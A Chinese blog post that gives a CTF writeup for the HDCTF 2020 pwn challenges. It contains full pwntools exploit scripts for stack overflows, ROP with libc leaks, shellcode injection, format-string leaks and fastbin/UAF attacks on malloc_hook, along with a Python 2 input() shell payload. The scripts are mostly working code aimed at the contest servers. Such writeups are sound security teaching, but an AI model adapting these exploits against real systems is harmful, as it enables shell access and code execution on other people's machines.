HDCTF 2020

国庆在家摸鱼,听到同学说有这个海南大学的新生赛,于是就来随便玩了玩

总体难度并不大,pwn题的考点都比较基础和常规,可以作为一个基础知识的回顾与熟悉  摸鱼日记

Writeup

pwn

calculator

漏洞点:使用了python2中的input函数,导致了任意代码执行

payload:

__import__('os').system("/bin/sh")

即可get shell

warmup

题目需要输入一个int型数据使得abs(v4)<0

我们只需输入最小的整数即可get shell 输入-2^31^ 即-2147483648

backdoor

简单的栈溢出,有后门,直接溢出到后门函数即可

exp:

from pwn import *
p= remote('39.107.127.44',10002)
p.recvuntil('name:')
backdoor = 0x400697
payload = 'a'*0xA+'a'*8+p64(backdoor)
p.send(payload)
p.interactive()

pwnme

没有开NX,有RWX的段并且可以往bss段上写数据,在bss段上写入shellcode,然后栈溢出返回地址到shellcode处即可

exp:

from pwn import*
p = remote('39.107.127.44',10006)
#p=process('./pwnme')
elf=ELF('./pwnme')
context(os='linux',arch='amd64',log_level='debug')
shellcode = asm(shellcraft.sh())
p.recvuntil('Name:')
p.send(shellcode)
payload='a'*40+p64(0x601080)
p.recvuntil('Try your best:')
p.sendline(payload)
p.interactive()

babyrop

通过puts泄露libc基址,然后rop打one_gadget

exp:

from pwn import*
p = process('./babyrop')
#ip = '39.107.127.44' 
#port ='10001'
p = remote('39.107.127.44',10001)
elf = ELF('./babyrop')
libc = ELF('./libc-2.23-64.so')
main = 0x400617 
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi = 0x4006d3
p.recvuntil('Your input :')
payload = 'a'*0x28+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
p.send(payload)
puts_add = u64(p.recv(6).ljust(8,'\x00'))
libc_base = puts_add - libc.symbols['puts']
log.info('puts:'+hex(puts_add))
log.info('libc_base:'+hex(libc_base))
one = libc_base + 0xf0364
p.recvuntil('Your input :')
payload = 'a'*0x28 + p64(one)
p.sendline(payload)
p.interactive()

echo

printf存在格式化字符串漏洞,flag被读到了栈上,利用格式化字符串将flag打印出来即可。

经过调试,得到flag在%27$p

%37$p 的位置上

每一项读出来十六进制转字符后逆序,最后全部拼接起来即可

exp:

from pwn import*
p = remote('39.107.127.44',10004)
flag = ""
def leak(index):
    p.recvuntil('>')
    payload = '%'+str(index)+'$'+'p'
    p.sendline(payload)
    answer = p.recvuntil('\n')[:-1]
    b = int(answer,16)
    answer = p64(b)[:4]
    return answer 

for i in range(27,38):
    flag += leak(i)

print flag

easyheap

存在UAF漏洞,利用unsorted bin泄露libc基址,然后fastbin attack 打 mallochook

exp:

from pwn import *
#p = process('./easyheap')
p = remote('39.107.127.44',10003)
libc = ELF('./libc-2.23.so')
#context.log_level='debug'
def add(id,size,content):
    p.sendlineafter('Your choice :','1')
    p.sendlineafter('id:',str(id))
    p.sendlineafter('size:',str(size))
    p.sendafter('content:',content)

def edit(id,content):
    p.sendlineafter('Your choice :','2')
    p.sendlineafter('id:',str(id))
    p.sendafter('content:',content)

def delete(id):
    p.sendlineafter('Your choice :','3')
    p.sendlineafter('id:',str(id))

def show(id):
    p.sendlineafter('Your choice :','4')
    p.sendlineafter('id:',str(id))

add(0,0x90,'aaaa')
add(1,0x90,'bbbb')
delete(0)
#gdb.attach(p)
show(0)
p.recvline()
main_arena = u64(p.recv(6).ljust(8,'\x00')) - 88
libc_base = main_arena-0x10-libc.sym['__malloc_hook']
log.info('libc_base:%x',libc_base)
malloc_hook=libc_base+libc.sym['__malloc_hook']
log.info('fake:0x%x',malloc_hook-0x23)
one = libc_base + 0x4527a
add(2,0x60,'cccc')
add(3,0x60,'dddd')
delete(2)
edit(2,p64(malloc_hook-0x23))
add(4,0x60,'eeee')
add(5,0x60,'\x00'*0x13+p64(one))
#gdb.attach(p)
p.sendlineafter('Your choice :','1')
p.sendlineafter('id:',str(6))
p.sendlineafter('size:',str(0x10))
p.interactive()

babyheap

存在堆溢出漏洞,unsorted bin泄露地址,fastbin attack 打malloc hook

exp:

from pwn import *
p = process('./babyheap')
p = remote('39.107.127.44',10000)
libc = ELF('./libc-2.23.so')
#context.log_level='debug'
def add(id,size,content):
    p.sendlineafter('Your choice :','1')
    p.sendlineafter('id:',str(id))
    p.sendlineafter('size:',str(size))
    p.sendafter('content:',content)

def edit(id,size,content):
    p.sendlineafter('Your choice :','2')
    p.sendlineafter('id:',str(id))
    p.sendlineafter('size:',str(size))
    p.sendafter('content:',content)

def delete(id):
    p.sendlineafter('Your choice :','3')
    p.sendlineafter('id:',str(id))

def show(id):
    p.sendlineafter('Your choice :','4')
    p.sendlineafter('id:',str(id))
add(0,0x90,'aaaa')
add(1,0x90,'bbbb')
delete(0)
#gdb.attach(p)
add(2,0x50,'c'*8)
#gdb.attach(p)
show(2)
p.recvuntil('c'*8)
main_arena = u64(p.recv(6).ljust(8,'\x00')) - (0xc08 - 0xb78) -88
log.info('main_arena:%x',main_arena)
#gdb.attach(p)
malloc_hook = main_arena - 0x10
libc_base = main_arena - 0x10 -libc.sym['__malloc_hook']
one = libc_base + 0x4527a
log.info('fake:0x%x',malloc_hook-0x23)
add(3,0x60,'dddd')
add(4,0x60,'eeee')
add(5,0x60,'ffff')
delete(4)
#gdb.attach(p)
edit(3,0x80,'\x00'*0x68+p64(0x71)+p64(malloc_hook-0x23))
add(6,0x60,'gggg')
add(7,0x60,'\x00'*0x13+p64(one))
#gdb.attach(p)
p.sendlineafter('Your choice :','1')
p.sendlineafter('id:',str(8))
p.sendlineafter('size:',str(0x10))
p.interactive()

hardheap

edit函数存在off-by-one漏洞,溢出1字节,先通过unsorted bin泄露libc地址

再通过off-by-one造成块堆叠,制造fastbin attack,打malloc hook

exp:

from pwn import *
#p = process('./hardheap')
p = remote('39.107.127.44',10005)
libc = ELF('./libc-2.23.so')
#context.log_level='debug'
def add(id,size,content):
    p.sendlineafter('Your choice :','1')
    p.sendlineafter('id:',str(id))
    p.sendlineafter('size:',str(size))
    p.sendafter('content:',content)

def edit(id,content):
    p.sendlineafter('Your choice :','2')
    p.sendlineafter('id:',str(id))
    p.sendafter('content:',content)

def delete(id):
    p.sendlineafter('Your choice :','3')
    p.sendlineafter('id:',str(id))
def show(id):
    p.sendlineafter('Your choice :','4')
    p.sendlineafter('id:',str(id))

add(0,0x90,'aaaa')
add(1,0x18,'bbbb')
delete(0)
add(2,0x50,'c'*8)
show(2)
p.recvuntil('c'*8)
main_arena = u64(p.recv(6).ljust(8,'\x00')) - ( 0xc08 - 0xb78) -88
log.info('main_arena:0x%x',main_arena)
#gdb.attach(p)
malloc_hook = main_arena - 0x10
libc_base = main_arena - 0x10 -libc.sym['__malloc_hook']
log.info('fake:0x%x',malloc_hook-0x23)
one = libc_base + 0x4527a
add(3,0x30,'dddd')
add(4,0x18,'eeee')
add(5,0x60,'ffff')
add(6,0x18,'gggg')
edit(1,'\x00'*0x18+p8(0x91))
delete(4)
add(7,0x80,'hhhh')
delete(5)
edit(7,'\x00'*0x18+p64(0x71)+p64(malloc_hook-0x23))
add(8,0x60,'iiii')
add(9,0x60,'\x00'*0x13+p64(one))
#gdb.attach(p)
p.sendlineafter('Your choice :','1')
p.sendlineafter('id:',str(10))
p.sendlineafter('size:',str(0x10))
p.interactive()

发表评论

电子邮件地址不会被公开。 必填项已用*标注